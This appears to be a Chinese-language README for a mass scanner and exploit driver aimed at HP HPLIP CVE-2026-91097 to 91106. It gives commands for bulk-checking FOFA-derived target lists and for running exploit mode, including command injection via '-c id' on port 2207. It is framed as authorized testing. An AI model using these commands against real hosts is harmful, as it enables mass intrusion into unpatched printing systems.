massexploit — HP HPLIP 大规模 CVE 检查器 (2026-09)
针对 HP HPLIP < 3.26.6 的大规模检查与研究利用驱动 — CVE-2026-91097 至 CVE-2026-91106。
| CVE | CVSS 4 | CWE | 远程 |
|---|
| CVE-2026-91097 | 7.0 | CWE-787 | 是 (UI) |
| CVE-2026-91098 | 8.6 | CWE-122 | 是 (UI) |
| CVE-2026-91099 | 5.1 | CWE-61 | 本地 |
| CVE-2026-91100 | 6.8 | CWE-78 | 本地 |
| CVE-2026-91102 | 8.4 | CWE-78 | 本地 |
| CVE-2026-91101 | 5.1 | CWE-129 | 物理 |
| CVE-2026-91103 | 5.1 | CWE-191 | 物理 |
| CVE-2026-91104 | 9.3 | CWE-122 | 是 |
| CVE-2026-91105 | 8.6 | CWE-122 | 是 (UI) |
| CVE-2026-91106 | 9.3 | CWE-122 | 是 |
已修复: HPLIP 3.26.6+
摘要
FOFA body="hplip" 命中通常是 :8000 PAPPL,而非 :2207。在目标列表中使用 host:port。
截图(--flow 大规模检查)

环境要求
- Python 3.9+
pip install -r requirements.txt
用法
pip install -r requirements.txt
# Single target (default ports 631, 2207, 9100 if no port given)
python poc.py -u 192.0.2.10 --mode check
# FOFA port (recommended)
python poc.py -u 192.0.2.10:8000 --mode check --flow
# Mass — all 10 CVEs
python poc.py --list targets.example.txt --mode check -j 30 -q --flow
# Critical network heap CVEs only
python poc.py --list list_hplip_printer.txt --mode check --cve CVE-2026-91104,CVE-2026-91106
# Exploit research (PAPPL on :8000 → IPP raster; -c id only meaningful on hpssd:2207)
python poc.py -u 192.0.2.10:8000 --mode exploit --cve CVE-2026-91106
python poc.py -u 192.0.2.10:2207 --mode exploit --cve CVE-2026-91100 -c id
FOFA → 目标列表
# Save export as fofa_csv_1049.csv (or pass -i)
python fofa_to_list.py
# list.txt (all) + list_hplip_printer.txt (title hint = HPLIP Printer Application)
python poc.py --list list_hplip_printer.txt --mode check -j 30 --flow
目标列表格式
192.0.2.10:8000
192.0.2.11:2207
192.0.2.12|CVE-2026-91106
带有 |CVE… 的行使用 | 之前的部分作为主机(可选的 CVE 提示,用于命中输出)。
CLI
输出
| 文件 | 内容 |
|---|
massexploit_results.jsonl | 每台主机的完整 JSON |
hits.txt | 候选目标(host|cve,…) |
常见检查 status 值
| 状态 | 含义 |
|---|
hplip_surface_candidate | 端口开放 + 版本/CVE 映射 |
network_surface_version_unknown | TCP 开放,可能为 HPLIP/PAPPL,版本无法读取 |
|
利用预期
| 状态 | 含义 |
|---|
pappl_raster_sent_no_shell_output | 在 PAPPL 端口发送了 IPP/光栅;HTTP 中无 id(堆 RCE 类) |
exploit_attempted_no_confirm | 已尝试,无验证 |
exploited |
仓库结构
.
├── poc.py
├── cve_catalog.py
├── hplip_probes.py
├── hplip_exploit.py
├── pappl_ipp.py
├── pappl_raster.py
├── fofa_to_list.py
├── image.png
├── targets.example.txt
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
局限性
- 并非通用 Web 扫描器 — 仅针对打印 / HPLIP TCP+HTTP 攻击面。
- 针对 PAPPL 上的 91104/91106 没有公开的武器化 RCE;光栅路径是研究性的,与 ZDI-26-656 一致。
- 物理/本地 CVE 在
--cve all 中列出,但无法大规模远程利用。
- 仅限授权测试。
参考资料
法律
仅用于授权安全测试。您有责任遵守适用法律和项目规则。